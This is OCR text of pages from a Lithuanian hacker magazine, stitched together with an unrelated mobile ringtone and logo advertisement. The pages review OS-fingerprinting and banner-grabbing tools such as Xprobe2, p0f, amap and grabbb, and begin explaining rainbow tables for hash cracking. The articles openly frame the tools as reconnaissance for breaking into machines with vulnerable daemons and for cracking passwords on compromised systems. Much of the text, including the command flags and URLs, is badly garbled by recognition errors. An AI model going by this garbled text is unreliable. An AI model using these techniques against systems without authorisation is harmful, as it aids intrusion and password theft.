teftp.com). Lakoniškų sprendimų mėgėjai gali paieškoti ati- 
tinkamų savo bylų valdymo įrankiams skirtų atnaujinim: 
Total Commander'iui aš suradau visa reikalinga. Taip nuto- 
lusiame serveryje saugomos bylos gali būti ne tik išstudi- 
juotos mėgaujantis įprastinio ftp patogumu, tačiau ir su pri- 
deramu SSH šifravimu. 


Dažnai warezą siunčiuosi avseg*.dat formatu, ta- 
čiau visi grotuvai atsisako su juo dirbti... 


Atsakyti į tavo klausimą, žinant tik praplėtimą — prak- 

tiškai nerealu, kadangi čia reikalingas patyręs ware- 

Zo scenos specialistas ;). Būtent jis žino, kad tiesiog 

taip groti bylą vargu ar pavyks. Čia į pagalbą galėtų 
ateiti programa VCD Gear (ww.vodgear.com), kuri per 
minutę .dat transformuos į gana žmogišką vaizdo for- 
matą, kuris įkandamas praktiškai bet kuriam DivX gro- 
tuvui su teisinga kodekų komplektacija. 
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Paliesk švelniai 
Įrankių rinkinys pro- 
tingam „remote fin- 
gerprint'ui“ 

PRIEŠ BET KOKĮ MŪšĮ 
PIRMA EINA ŽVALGYBA, 
KAS NĖRA STEBĖTINA = 
JUK KUO TU DAUGIAU ZI- 
NAI APIE SAVO PRIESĄ, 
TUO DIDESNĖ TIKIMYBĖ, 


FERRUM 


SOFTWARE 


IMPLANT 


ITyrinėtojo Įrankių rinkinys] 


1. XPROBE2 
Attp: Ixprobe.sourceforge. net 


IAprašymas) Tal lingės Ir nažangus Įrankis, su 
urtas remiant moksliriais Oro Arkino tymai. 
Progranos veikimo aigorimas nėra in sudėtas. 
mums svarbiausia būs tai,kad programa pirštų ari 
spaudų nuėmimui naudoja UDP paketus. Oeiguiš 
nutolus komytteri es negauna aisakymo | 
UDP užklausą, Xorobe OS nusiatyi nesugebės. 


HACK 


Palelužiant šlą programą galima nurodyti ganėtinai 
dauopeijų, Kurios ekažia Ją lanksčiai konigūnuot, 


INaudojimas) Dabar aš papasakosiu apie pačias 
kiomiausias vėlavėjes, TCP Jungčų skenavino e- 
žimas nurodomas su vėllavėle -T čia galima nuro- 
dyti dominantį diapazoną, pavyzdžiui, talp: -T20 
80.110,3306. Beje, šuo atveju Xprobė pabandys 
surasti ir ugniasienės filruojamas jungtis. Anaio- 
lškaiikrinamos Ir UDP Jungtys, tai aktynuojama su 
velavėje -U, Parametras -v pateikta Išsamų Info 
maciją apie programos užkrautas modulius (mo- 
Culius aktyvuoti r deaktyvuoti galima si vėliavėlė- 
mis "Mir D). Yra alimydė trasuoti Kol ii reiia 
mo tinklo mazgo (vėliavėlė -r.. Panorėjus su para 
metrų "K galima Išsaugoti NMI fomato programas 
stoskaitą, 


SCENA 


UNIXOID 


IYpatybės] Semvenyje naudojamą operacinę siste 
mą Xyvobe Nustato pakankamai Uksii, 0 įeiu Š0 
nustatymo metu atsirado ginčytinų niuansų, ataskai- 
toje bus pateiktas labiausiai tikėtinų OS sąrašas su 
procentiniu ekimybių santykiu. 

Išvados] Pragrama man labal patiko, daugybėje 
testų pasirodė Iš geriausios pusės, todėi būtinai įs- 


dėmėk Xprobe, kadangi I tau ne karą paslūys teisin 
šąsaendimą. 


“- 
i] 


CODING 


UNITS 


KAD PASIŲSI JĮ | NOKDAUNĄ VIE- 
NU SMŪGIU. NĖ VIENA TINKLO 
ATAKA NEAPSIEINA BE IŠANKS- 
TINIO NUTOLUSIOS OPERACI- 
NES SISTEMOS TIPO NUSTATY- 
MO IR MAŠINOJE PALEISTŲ SER- 
VISŲ ANTRAŠČIŲ (BANNERS) 
GAVIMO. VĖLIAU ĮSILAUŽIMO 
METU ŠIE DUOMENYS BUS KRI- 
TIŠKAI BŪTINI. JUK DAUŽYTI SU 
LINUKSINIAM PROFTPD SKIRTU 


2. SPHON 
p: slphon saurcetone net pubišiphonslpion-0.0.3-1.sre.pm 


LAprašymas) Tai pmasis pretendentas Iš programų, Kurios r6- 
alizuoja pasyvy steko studijavimą. Siton klausasi am tos tn- 
Klo sąsajos, analizuoja paketus Ir ormuoja išsamias otaskaitas. 
Saveimė suprantama, panaudoti šią programą Kokio nors Vieno 
serverio, kuris nėra tame pačiame tine, kap iru, sistemos nu: 
statymui nepavyks, ŠI programa skiria kltkam: Ją galima Jalesti 
Užgrobtame serveryje ru ja tyrinėti karoratyvinio tinkla Vid. 


1Naudojimas) Palekdino mietų reikėtų nurodyti Vs labo d svar 
bius parametrus: 

I -<sąsaia> K -0 <Nename.Nt> 
Pirmasis parametras leidžia nurodyti „Avojybal“ Ir paketų analiee! 
naudojamą tUnklo sasają  jelsi reikia konsutacių, gerlausia 
kreiptis į con) Antrasis parametras nurodo, kur bus išsaugoti 
s!suras! sunesal!r Juos atlinkanėlos operacinės sįsemas. Pa- 
kankamai dažnai ka siphon nesuseba nusiattiOS. alia toklo 
tinklo mazgo IP palieka perirto TOP paketo lango Ig Byloje Os9- 
fints con tu al ast! mažai Operacinių Sstemų piršių antspau" 
dy (Jango dydis:TTL:DF:operaeinė sistema“ formatu): 
2102:128-1:Mindows NT nx 
4470:128.1:Mndows 2000 RC1 
 2328:255:1:80laris 26 - 27 


IYpetybės] Dar karių pabrėšių, kad siphor steką analizuoje pas 
vu režimu, neinicialzuodama susiungimų. Čia aš tuo noriu pasa: 
ut, kad bent kiek ryškesnlo tinko vaizdo susidarymui Ir rie ja 
prijungtų kompiuterių (bei, sevalims suprantama, Juose veikiančių 
Operacinių sistemų) gavimui prireiks liko. Suni pasakyt kiek 
būtent, tačiau Jelgu pragrama Idiegta servenje, | kurį kreipiasi 
au mašinų, ia rezultatus lima gauti maidaug per pusvalandi. 


Ilšvados| Man pačiam š! programa patiko Ir rekomenduočiau si 
Ja šiek iek padirbėti. Nori programą pritaiy! sąžiningai? Galiją 
įdiegti į hokį nors web serveri Ir surinkinėti beveik rinkosarinę. 
Informaciją aple lankytojų naudojamas operacinės sistemas. 


lahnėse 


Winsečije, Oi maja 
Kal praversti Vinosap. 
Pm. 


EKSPLOITU PER WINDOWS SIS- 
TEMOJE VEIKIANTĮ SERV-U DE- 
MONĄ — UŽSIĖMIMAS KVAI- 
LIAMS. KAD TOLIMESNĖS TAVO 
ŽVALGYBOS VYKTŲ SKLAN- 
DŽIAU IR BŪTŲ KOMFORTIŠ- 
KESNĖS, MES TAU PARUOŠĖME 
ŠIUOLAIKINĖS REMOTE FIN- 
GERPRINT'INIMUI SKIRTOS 
PROGRAMINĖS ĮRANGOS AP- 
ŽVALGĄ. 


3. POF 
hito. NcamtuEooresduma 4 pg 


[Aprašymas] Siphor tiso daug funkcijų turintis tinklo srauto ana: 
fizatorius. Programą sukūrė Michailas Zalesskis, 0 pagiai galimy- 
tų Me taro tokio po įrankių pOf rausia yra eri venas 
pačias svarbiausias ypalybės, 0 tuo pačiu Ir reikalingas vėliavėjes. 


[Naudojimas] 
* Veikimas denona režimu Ivėliavėtė -d) 

* Plas gautų paketų turinio pateikimas (dumo) x) 

= Konkretaus soketo klausymasis (G) 

+ Galimybė paleisti programą choot režimo Ir padaryti setu | bet 
Kurį vartotoją |-u) 

= Nuskaltyias iš su tepdump sukurtos bylos-atvaiao Ir 
komas labai pažangia galimybe I-s! 

* Laiko žymių nustatymas, vienos eilutės loginimo režimas, rezul- 
tat išsaugojimas MySOL duomenų bazėje Ir taip alia 


mege) li 


Ypatybės] Po įdiegimo | sistemą programą galima paleisti be 
paremetų arba su opeija +, sU Nuria teikių perduoti Kausormo. 
tinko sąsajos pavadinimą. 


Išvados] Manau, kox Gaugjau Kamentanį aple BO nebereikia 
Programa turi idel potenciaią, unkcionalumną ir puikiai pasirodė 
Maro testuose. 


[Švelnūs prisilietimai] Apie tinklo steko piršto antspaudų (fin 
gerprint) nuėmimo technologiją tavo mėgiamam žurnale buvo 
rašoma jau ne kartą. Jeigu skaitei atidžiai, tai tikriausiai žinai, 
kad norint nustatyti OS tipą mašinai siunčiami specialūs IP pa- 
ai, kuriuose nėra jokios ypatingos informacijos, tačiau kiek- 
viena operacinė sistema į tokias užklausas reaguoja skirtingai. 
Kokiais paketais ir kokia tvarka atsako sistema tai ir apibrė- 
žia jos priklausomybę vienai ar kitai šeimai. 

atsakymų visuma ir suformuoja parašą (signatūrą), kuri 
ia atskirti vienas operacines sistemas nuo kitų. Skirtingų 
sistemų signatūrų rinkiniai surenkami į vieningą bazę ir naudo- 
jami OS fingerprinting'ui. Savaime suprantama, pirštų antspau- 
dams paimti įvairūs įrankiai naudoja skirtingas metodikas. 

Yra iš viso du tinklo steko analizės metodų tipai: aktyvus ir pa- 
syvus. Su aktyviu viskas gana aišku: išsiunčiam keletą paketų, 
laukiam atsakymo ir analizuojame jo turinį. Pasyvios steko ana- 
lizės atveju visi aukščiau aprašyti veiksmai atliekami nesiun- 
čiant užklausų nutolusiam mazgui — kompiuteris tiesiog laukia 
iš kitos mašinos atsiunčiamo paketo ir jį analizuoja. Skirtumas 
akivaizdus: užuot, kad „provokavę“ nutolusį tinklo mazgą atsa- 
kyti į mūsų pasiųstus duomenis, mes tiesiog banaliai laukiame, 
kol kompiuteris PATS neparodys tinklinio aktyvumo. Šiandien aš 
papasakosiu apie įrankius, kurie įgyvendina abu tyrimo meto- 
dus. Štai šie niekšeliai. 

Pradžiai paaiškinsiu ir aptarsiu kai kuriuos dažnai kylančius klau- 
simus, kad daugiau niekam nereikėtų prie jų sugrįžti. Kas gi tas 
serviso baneris (antraštė)? Tai pasisveikinimo pranešimas, kurį 
serveris po prisijungimo pateikia klientui. Įsivaizduokim, kad mano 
lokalioje mašinoje paleistas pureftipd. Kai aš prie jo prisijungiu 
su standartiniu ftp klientu, pamatau maždaug tokį vaizda: 


220 


Pur-FTP4 
50 allow 


Serve 


me. 


220-You aro User number 
220-bocal time i 


now 


220 You will be disconnected afier 15 minutes ol inadivity 

Būtent tai ir yra ftp serviso „baneris“. Šiaip tai antrašte gali 
atrodyti ir kitaip, jos gali iš viso nebūti. Dažniausiai joje nuro: 
doma serviso versija (pavyzdžiui, SSH atveju tai būtų tokio 
pavidalo užrašas: SSH-1.99-0penSSH 3.6.1p2) arba koks 
nors kitas kompiliavimo metu administratoriaus nurodytas 


[Didysis ir siaubingasis] 
Da r šioje apžvalgoje nepa- 


J , apie šį jungčių skenerį 
kur tik įmanoma. Antra, kaip man 

pačiam atr NetMapper — ne tokia jau universali p 
grama. Noriu pasakyti, kad ji iš tiesų moka daug; slaptai 
skenuoti ( nustatyti OS tipą (-0) ir taip toliau, tačiau 
praktiškai naudoti nmap ne visada patogu ir prasminga. 
body shellą gavo root teises, da- 
bar jam būtina kiek įmai greičiau nuskenuoti potinklį 

r jame surasti kitas mašinas bei pažeidžiamus servisus 
Ar tokiu atveju kam nors šaus | ga mintis siųstis gremėz- 
dišką distributyvą, įdieginėti jį į sistemą, patenkinti visas jo 
priklausomybes bei laukti, kol jis nuskenuos visą potinklį. 
Tą patį galima padaryti su nedideliu įrankių rinkiniu. Kitaip 
akis aktualus toli gražu ne visose situacijose. 
umo įrankis nmap dar pa- 

ims lyderio pozicijas. 


Pavyzdžiui, hakeris per no 


kankamai ilgai u 


5 
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tekstas (pavyzdžiui, Narkomany Go Home). Beje, pasisveiki- 
nimo pranešimas dažniausiai nėra keičiamas, todėl įmano- 
ma nustatyti demono versiją ir net parinkti jam skirtą viešą 
eksploitą. Demonas apklausos metu gali netiesiogiai išduoti 
ir informaciją apie mašinoje įdiegtą operacinę sistemą, kas 
patiems įsilaužėliams tik į naudą. Būtent todėl banner grab- 
bing (servisų antraščių surinkimas — angl.) įsilaužėliams la- 
bai svarbus, net kur kas svarbesnis, nei nutolusios operaci- 
nės sistemos versijos nustatymas. Šiems tikslams patyrę ha- 
keriai sukūrė daugybę įrankių ir specialių programų, kurios 


[Geografijos pabaiga] Štai ir viskas, ką aš šiame straipsnyje 
norėjau tau papasakoti. Aprašyti įrankiai skirti darbui UNIX siste- 
moje, nors kai kurie (siphon, nmap) yra perkelti ir į Windows OS. 
Jeigu tau to maža, tuomet parsisiųsk bet kokį pažangų saugumo 
skenerį, kuris turi visas reikiamas savybes (SSS, Retina, Fluxay, 
Xspider ir taip toliau). Ir dar — visus įrankius aš testavau Mandra- 
ke Linux 9.2 sistemoje su iš paketų įdiegta libpcap biblioteka. 
Kaip man atrodo, toje pačioje FreeBSD 5.3 greitai priversti dirbti 
visas paminėtas programas nepavyks :). Visas programas reikia 
leisti root vardu, kadangi jos naudoja raw soketus, ICMP ir kitus 


užsiiminėja šiuo paprastu darbeliu :). 
[Tinkliniai grobikai] 


1. GRABBB 
Wwww.securityfocus.com/data/tools/grabbb- 
0.0.7.targ2 


[Aprašymas] Tai iš tiesų uraganiškas antraščių 
grabberis, Kurį parašė kieti vaikinukai iš TESO ir 
kurį labai patogu naudoti skenuojant didelius 
potinklius. 


ĮNaudojimas] Šis įrankis turi ne tiek jau daug; 
opcijų: 

—x — prisijungimų skaičius (pagal nutylėjimą 
250) 

-a— pradinis skenuojamas adresas (pateikia- 
mas a.b.c.d pavidalu) 

-b — galutinis skenuojamas adresas 

=m — ne vienos eilutės režimas, kuriame iš 
serviso nuskaitoma ne tik pirma pasisveikinimo 
eliutė, bet visas pranešimas (kalp, pavyzdžiui, 
Jau mano paminėtu fp demono atveju) 

-s — galutinė ataskaita pasibaigus skenavimui 


Po paleidimo ir parametrų perdavimo reikia nu- 
rodyti, kokios būtent jungtys tave domina. 


[Ypatybės] Ši įrankį labai patogu naudoti tiek iš 
viso veikiančių tinklo mazgų paieškai, tiek ir pažei- 
džiamiems servisas, kuriuos galima eksploatuoti, 
rasti. Beje, daugelis būtent taip ir daro: Ieško viešų 
Ap, telnetd, smto servisams skitų eksploitų, foni- 
niame režime paleidžia grabber|į, kurį užsiundo ant 
kokio nors tinklo. Kai potinkio šukavimas baigtas, 
Įsilaužėlis pateiktoje ataskaitoje ieško mašinos su 
įdiegtu pažeidžiamu demonu ir tokią mašiną be 
Kokių nors ypatingų pastangų tiesiog nulaužia. 


tikrink srautą! 


dalykėlius, kurie neprieinami paprastiems vartotojams iki 18. 


Ilšvados] TESO kuria puikius produktus, 0 dau- 
Eybė hakerių su šiuo grabber'iu skenuoja dide- 
lius tinklus, taip ieškodami tik pažeidžiamų ma- 
šinų. Be abejo, jie niekšai, bet ką padarysi. 


2. AMAP 
www.thc.org/download.php?t=ršf=amap- 
5.2targz 


ĮAprašymas| Tai labai patogus Ir profesiona- 
liai sukurtas įrankis, Kurį | pasaulį paleido vo- 
kiečių hakeriai THC. Jis be įprastinio servisų 
antraščių gavimo moka labai daug. 


INaudojimas] Amap paleidžiamas taip: 
$ amap Įmodes) | options] host ports 


Jungtis reikia nurodyti per tarpą. Tuojau mes 
pakalbėsime ir apie režimus bei opcijas. Štai 
pačios skaniausios opcijos ir parametrai: 
-A-— įjungia režimą, kuriame nustatomas per 
nurodytą jungtį veikiantis servisas (baneriai nėra 
registruojami) 

-B — tiesiog gauti banerius ir išvesti juos į ek- 
raną 

-P — amap pavirsta paprasčiausiu jungčių 
skeneriu, kuris nustato serviso būseną (bane- 
riai Ir servisai nėra nustatomi) 

-i— nuskaityti duomenis apie mašiną iš nmap 
suformuotos ataskaitos (savaime suprantama, 
tam prieš tai reikia nuskenuoti mašiną su nma- 
pu) 

-d — visas užklausas rašyti į bylą 


Amep taip pat moka dirbti su IPV6 adresais 
Ivėliavėlė -6), siųsti užklausas konkrečiu pro- 
tokolu (-p), tikrinti UDP jungtis (-į) ir taip toliau. 


ĮYpatybės] Atvirai šnekant, ši programa nėra 
Jau tokia universali, Kaip atrodo iš pirmo žvilgs- 
nio. Juk prieš naudojimą reikia žinoti, kokios 
jungtys atidarytos, o kokios — ne. Nors, kita 
vertus, jeigu tave domina tik tam tikri servisai, 
gali šį įrankį drąsia įtraukti į savo arsenalą. Pa- 
vyzdžiui, kam tau reikalingas ftp baneris, jeigu 


tavo kišenėje puikuojasi MySOL (3306 jung- 
tis) eksploitas? Būtent apie tai aš ir kalbu :) 


[Išvados] Tai perspektyvus ir aktualus įran- 
kis, kuriuo naudojasi daug žmonių. Kodėl gi ir 
tau neprisijungus prie slaptos jų bendruome- 
nės? :) 

3. Skin 

http:/skin.sourceforge.net 


[Aprašymas] Skin — tai labai greitas jungčių 
skeneris, kuris neblogai moka nustatinėti ser- 
visus. 


[Naudojimas] Skeneris paleidžiamas labai pa- 
prastai: 
$ skin [options] hostname 


Pagrindinės įrankio opcijos: 

-sT įprastinis TCP skenavimas 

=sS naudojama SYN vėliavėlė, susijungimas 
neužmezgamas (kaip nmap'e) 

—SV registruojamos servisų antraštės 


Taip pat galima nuskenuoti kokį nors tinklo maz- 
EA, 0 po to, perskaičius loge užfiksuotus duo- 
menis, patikrinti banerius. 


[Ypatybės] Šis skeneris sukurtas naudojant 
modulinę architektūrą ir prie jo labai lengva pri- 
dėti naujus įskiepius, tuo pačiu praplečiant jo 
funkcionalumą. 


(Išvados] Šiaip tai šis projektas atrodo šiek 
tiek užmestas, tačiau naudoti šį skenerį galima 
Jeigu tau reikia kažko greito Ir lengvo Ir nėra 
laiko kompiliuoti gremėzdiškus projektus. 
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7 GARSAI 


Ėjimas plonu ledu 
Vyro niūniavimas 
Kosulys 


ryry“ 


GYVAS 64711 
GYVAS 69011 
GYVAS 73311 
Aplodismentai GYVAS 41311 
Wow! GYVAS 87711 
Indėnų dainavimas GYVAS 74511 
Formulės bolidas GYVAS 60011 
Maišomos kortos GYVAS 65311 
Arklių lenktynių pradžia GYVAS 67611 


Ani nori taugias, siųsk, |: Rašyk žiautų: GTVAS 64711. 
DAUGIAU numeri 1678. 2. Siųsk ameriu 1678. 

Kaina 3 tai. pausk nuorodą ir Zisisisk garą, . 
Teilonė tui Gi VAP I GPRS unkcijos. 


[1] sava žaimimai 


' 


VAVYVYNNTVITYNYTYTII 


JAVA 39311 JAVA 41711 
as z Ninja Attack Moon Buggy 
A Raiykšnuę JAVA 39311 rss ją 
numeriu 1679. 
Ž Spausk nuorodą I atsiųsk žaidimą. 
Tiieons tai buti P r GPS Tankis. 
aina T itai 


Tinka: Motorola T720. Nokia 3411 


JAVA 42511 
PTK Racer 


10Lt 
JAVA 
AA si 


L Ococorirai 


= L060 192711 L0G0 199111 

Ss M R 
L060 229211 | 1060 231211 
m L4 LTD 
L060 246111 1060269911 | L060 272011 
No (EK 
Loco 273211 1060 275311 


K(CTO 
1060 210411 


1060 245011 


1060 276711 


1. Rašyk žinutę: L060 192711, 
nusiųsk draugui: LOGO 192711 585840. 

| - 2. Siųsk numeriu 1654. 

j Nespalvati Siemens ir Ericsson po 

je Kada rašo S arba E raidą Kaina? tai. 


|| CARD 2111 CARD 3411 


= CARD 3211 
: A Rio 
„ CARD 8711 CARD 9911 
= E es ago 
|=- S 1 Ma ini sin 


p CARD 10611 CARD 13811 "CARD 16711 
1. Rašyk žinutę: CARD 2111. 
4 2. Nusiųsk draugai: CARD 2111 68564mu.. 
Siųsk numeriu 1654. 
Nespalvoti Siemeas Ir Ericsson po kodo 
rašo S arba E raidą. Kaina 2 litai 


Kokybės telefonas 860042751 nuo 12 iki 17. 


Rašyk žinutės laukelyje DAUGIAU Ir siųsk trumpuoju numeriu 1679. 
Netrukus gausi nuorodą, kurią aktyvavęs galėsi išsirinkti tau patinkančią pramogą! 
Telefone turi būti WAP/GPRS nustatymai. Kaina 3 Lt 


2 MELODIJOS 


Benny Benassi - Satisfaction 

Juanes - Volverte A Ver 

Depeche Mode - A Pain I'm Used To 
Pink Panther - Theme 

Flipsyde feat. Piper - Happy Birthday 
Blue Lagoon - Now That We Found Love 
Robbie Williams - Advertising Space 
Deep Dish feat. Stevie Nicks - Dreams 
Vaiduoklių medžiotojai 

Mattafix - Big City Life 

K. WEST ft. A. Levine - Heard 'em Say 
Darude - Sandstorm 


POLY 21011 MELO 132811 
POLY 1045211  MELO 197411 
POLY 1044611 MELO 196711 
POLY 8811 MELO 118711 
POLY 1056711  MELO 201711 
POLY 1061311  MELO 202311 
POLY 1039411 MELO 191111 
POLY 1062311  MELO 203511 
POLY 60211 MELO 134511 
POLY 1057011  MELO 202011 
POLY 1039311 MELO 191511 
POLY 3911 MELO 26011 

Aha - Analogue (All | Want) POLY 1062511  MELO 203711 
Axelf - Crazy Frog POLY 1009611 MELO 164211 


1. Rašyk žinutę: POLY 21011. Nusiųsk draugui: POLY 21011 68584xxx. 2. Siųsk numeriu 1679. 
Jei nori daugiau, siųsk DAUGIAU numeriu 1679. Kaina 3 litai. 

1. Rašyk žinutę: MELO 132811. Nusiųsk draugui: MELO 132811 685840x. 

2. Siųsk numeriu 1654. Nespalvoti Siemans Ir Ericsson po kodo rašo S arba E raidę. Kaina 2 litai. 


FONAS 29411 FONAS 38311 


= 


FONAS 57811 7 61211 


FONAS 3811 


FONAS 14411 FONAS AE 


m 


Rosas 4081 FONAS 49111 FONAS 54811 


FONAS Ta FONAS 74811 FONAS 126611 FONAS 128411 FONAS 158911 


| 


FONAS 237011 FONAS 237311 FONAS 1004911 


1- Rašyk žinutę: FONAS 3811. 
2. Siųsk numeriu 1678, 
a Ir aisisiųsk (ona. 
AP Ir GPRS funkcijos. 
, siųsk DAUGIAU numeriu 1678. 


Jei nori daugi 
Kaina 3 litai. 


L9G0, MELO, CARO: Si, Griniai AAS EL ,TO8L T610, 7630; 
A2105. Tik ILO, Šiems palotiems Nokia, 


siena 
A AU TNA žž 
ŠT60 Sonenessn' T610, T630, k. bad šKisiinG El E100, E700, X100, MOTOROLA CS 


SPAS! Norėdami aktyvuoti! binkite savo operatoriaus Informacijos linij 
Tele2117, Bitė 1501, Taka edo == „e pe 


Turinis tiekėjai: „Mabile Vision Europe NVSA“, „Indiagames Ltd“, „Kilos ApS“, „Eurocom Celiular Communications“, „Zindell Tachuologies, Ltd“, „Lunagames Internationai B.V“ 


FERRUM 
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HACK 


Vaivorykštė lentelėse 


„Rainbow tables“ panaudojimas ypač 
greitam hešų nulaužimui 
SIUOLAIKINĖSE AUTENTIFIKACIJOS SISTE- 
MOSE ITIN SVARBIOS HESŠŲ FUNKCIJOS — 
SPECIALŪS ATVAIZDAI, KURIE PAGAL JIEMS 
PERDUOTĄ EILUTĘ GENERUOJA TAM TIKRĄ 
SIGNATŪRĄ, ANTSPAUDĄ, ARBA ŠIFRUOJA 
SIĄ EILUTĘ. MŪSŲ ZURNALO PUSLAPIUO- 
SE MES NE KARTĄ BUVOME SUSIDŪRĘ SU 
TOKIA PROBLEMA, KAI REIKĖJO ATLIKTI AT- 
VIRKSTINĘ OPERACIJĄ: PAGAL ZINOMĄ HE- 
SO FUNKCIJOS REIKSMĘ ATSTATYTI ORIGI- 
NALIĄ EILUTĘ. TOKIO TIPO UŽDUOTYS IŠ- 
KYLA GANA DAŽNAI. JEIGU NORI NULAUZ- 
TOJE SISTEMOJE SUŽINOTI VARTOTOJO 
SLAPTAZODĮ, PRISIJUNGTI PRIE SVETIMO 
VPN SERVERIO, TAI TAU TEKS NULAUZTI 
GAUTĄ HESĄ. SIANDIEN MES PASNEKĖSI- 
ME APIE SIUOLAIKIŠKIAUSIĄ IR PROGRE- 
SYVIAUSIĄ ŠIOS PROBLEMOS SPRENDIMO 
BUDĄ, KURIS LEIDZIA PAGEIDAUJAMUS HE- 
SUS SUTVARKYTI KELIŲ VALANDŲ BĖGYJE 
(ARBA GREIČIAU). 


“a 
T 
2 


*ų 
aa —-— B 


* 


[Pradžia] Daugelyje sistemų vartotojų slaptažodžiai nėra sai 
gomi atviru pavidalu, čia sudėtos tik juos atitinkanči 
funkcijų reikšmės. Susidaro situacija, kai net pati sistei 
no vartotojo slaptažodžio: ji turi tiktai antspaudą ir au 
cijos metu sulygina vartotojo perduotos eilutės hešą su tu 
saugoma sistemos viduje. Taigi net jeigi 


reikšmių panaudoti 
„ dabar daugelis projektų ke 
ne, ganėtinai keisto dalyko: 
kacijai su hešu-slaptažodži 
tikru marazmu. Pavyzdžių toli ieškoti 
web forumų, kurie vartotojų sausa 
užšifruotus jų slaptažodžius ir autentifikacij 


reikšmes. 


Jeigu autentifikacija pagal hešą-slaptažodį negalim 
lis susiduria su rimta problema: reikia kaip nors pa 
hešą gauti pradinę slaptažodžio reikšmę-eilutę. O 
u būdu: negalima atme 
kuomet dvi skirtingas eilutes atitiks viena ir ta pati hešo funkci- 
jos reikšmė. Būtent dėl šios priežasti 
tai kolizijos, 0 ne pradinės eilut 
Juk jeigu eilutės „įkfdskhjvk“ ir „Okfdjkvidhlbdmhbf“ 
ną hešo reikšmę, tuomet neimanoma tiksliai nus: 
Jų sugalvojo gudrusis vartotojas. 

Kaip galima surasti koliziją? Pats paprasčiausi 
variantas — bukas visų galimų reikšmių i 
jama daugybė visų įmanomų eilučių 
mas pirmas elementas, 
su turimu. Jeigu reikšmės sutaps, tai į 
kolizija surasta. Jeigu nesutampa — 


išspręsti galima ne vi 


hešo nulaužimas - 


ST 


iją atlieka pagal šias 


5 teisinga manyti, kad 


neruojamas jo 


p tol. kol nebus surasta kolizija arba nepasibaigs preten- 


lentų aibė. 
Deja, 


toks būdas negali užtikrinti gero našumo. Esmė tame, 
rrinkimo procesas trunka pakenčiamą laiko tarpą tik tuo 
u, jeigu variantų aibė nėra labai didelė. Visų galimų eilučių 
iki 10 simbolių perrinkimas — hakeriui nežemiška užduotis 
Būtent dėl šios priežasties žmonės pradėjo ieškoti būdų, kaip 
optimizuoti kolizijų paieškos procesą. Ir ką gi tu manai, jie jį 
surado. 


[Naujasis metodas] Viskas prasidėjo šiek tiek anksčiau, nei 
tu gali įsivaizduoti. Dar 1980 metais Martinas Helmanas pa 
kardinaliai naują požiūrį į hešų funkcijų kriptoanalizę: jis 
ė panaudoti iš anksto sudarytas ir atmintyje išsaugotas 
lenteles. Tačiau visiškai aišku, jog saugoti visų įmanomų raktų 
variantų hešus-reikšmės absurdiška idėja. Negana to, kad 
tokios lentelės užims protą šiurpinantį terabaitų kiekį, tai pa- 
ieška jose suris neįtikėtinai daug laiko. 

Helmanas pasiūlė gana originalią koncepciją, kuri pagrįsta pra 
dinės raktų aibės šuskaidymu į poaibių rinkinius. Praktikoje tai 


= daroma taip: 
- 1. Fiksuojama darbinė abė- 


— cėlė, t.y. nurodoma visų ga- 


p 


limų raktų aibė 0. 

2. Fiksuojamas aibės 0 ele- 
mentas g ir pagal jį apskai- 
čiuojama hešo funkcijos 
reikšmė h. 
3, Su tam tikra „apipjaustan 
čia“ funkcija R iš hešo gene- 
ruojamas raktas, priklausan- 


is paviršius, kuris leidžia susidaryti įspt 


i O: g=Rih). 
lementų skai- 
čius grandinėje ma 
žesnis už nurodytą, tai 
atliekamas perėjimas 
į 2-ąjį punktą 


Toks iteracinis proce: 
sas atliekamas iki tol, 
kol mes nerasim t i|- 
gio raktų grandinės. Vi 
sa ši seka į atmintį nė- ; 
ra saugoma, įrašomas 
tik pirmas ir paskutinis 


pu primena kriokliuk 


jos elementai. Tame ir slypi metodo esmė: jeigu, tarkim, gran- 
dinėje yra 1500 raktų, tai mes gerokai sutaupysim atminties, 
tuo pačiu sutaupydami tolimesnei kriptoanalizei reikalingo I 
ko. Žodžiu, pradinis šio metodo variantas verčiasi kaip „kom- 
promisas tarp kriptoanaliz sąnaudų ir at 
minties“, todėl viskas logiška. Tačiau sugrįžkime prie metodo 
aprašymo 


Su aprašytu algoritmu generuojamas tam tikras grandinių, ku 
rias galima patogiai pavaizduoti dvimačio masyvo pavidalu, kiekis 
arba lentelė su dviem stulpeliais, kur pirmame yra pradinis gran: 
dinėlės raktas, o antrame — galutinis. Po to, kai grandinės 
sugeneruotos, jau galima atlikti rakto paiešką. Tai ieškoma taip 
taip 

Iš pradžių nurodoma hešo funkcijos reikšmė, kuriai reikia g 
koliziją. Su apipjaustančia funkcija R nustatoma rakto KO reik 
mė, iš kurios pagal aprašytą algoritmą sudaroma paieškos 
dinė, kurioje yra ne daugiau t elementų. Jeigu lentelėje yr 


ieš 


32] 


[HAKERIS 05 [36] 06 


komas raktas, tai vienas iš sugeneruotų naujos grandinės ele- 
mentų bus terminaliniu mūsų lentelės elementu. Toliau pagal 
žinomą pradinį elementą visiškai nesunku išvesti visą termina- 
linį elementą atitinkančią grandinę, įskaitant ir elementą, kuris 
betarpiškai eina prieš pradinę KO reikšmę, t.y. raktas, kurio mes 
ir ieškome. Tačiau tokia teigiama įvykių eiga galima tik tuo atve- 
ju, jeigu sugeneruotose lentelėse iš tiesų yra kolizija. Čia iškyla 
vienas prasmingas klausimas: kiek reikia sugeneruoti grandi- 
nių, kad jos padengtų visų įmanomų raktų aibę. Deja, viena- 
reikšmiškai atsakyti į šį klausimą neįmanoma. 


[Lipni bjaurastis] Esmė tame, kad negalima atmesti varian- 
to, kuomet skirtingais raktais prasidedančios grandinės turės 
vienodus elementus ir po tam tikros pozicijos „sulips“. Taip 
nutinka dėl apipjaustančios funkcijos natūros: juk ji didesnę 
aibę atvaizduoja į mažesnę. Suprantama, kad hešų aibėje įma- 
nomų elementų žymiai daugiau, nei raktų aibėje. Dėl to kelis 
hešus atitinka tik vienas raktas. Jeigu tau nesiseka įsivaizduo- 
ti, tai atitinkamame paveikslėlyje galima pamatyti vaizdžią iliust- 
raciją. 

O aš kol kas pratęsiu pasakojimą apie grandinių kiekį. Šiaip jau 
norint Užtikrinti pilną aibės O padengimą, būtina sugeneruoti 
be galo didelę lentelę su grandinėmis. Esmė tame, kad grandi- 
nių sulipimo dažnis greitai didėja kartu su lentelių augimu. To- 
dėl reikiamų sekų skaičius apibūdinamas reikiama tikimybe (aš 
ją pažymėsiu kaip P*) to, kad laisvai pasirinktas raktas 4 iš ai- 
bės O bus mūsų poaibių sistemoje, mūsų lentelėje. Būtent rei- 
kiama tikimybė P* apibrėžia reikiamą lentelės su grandinėmis 
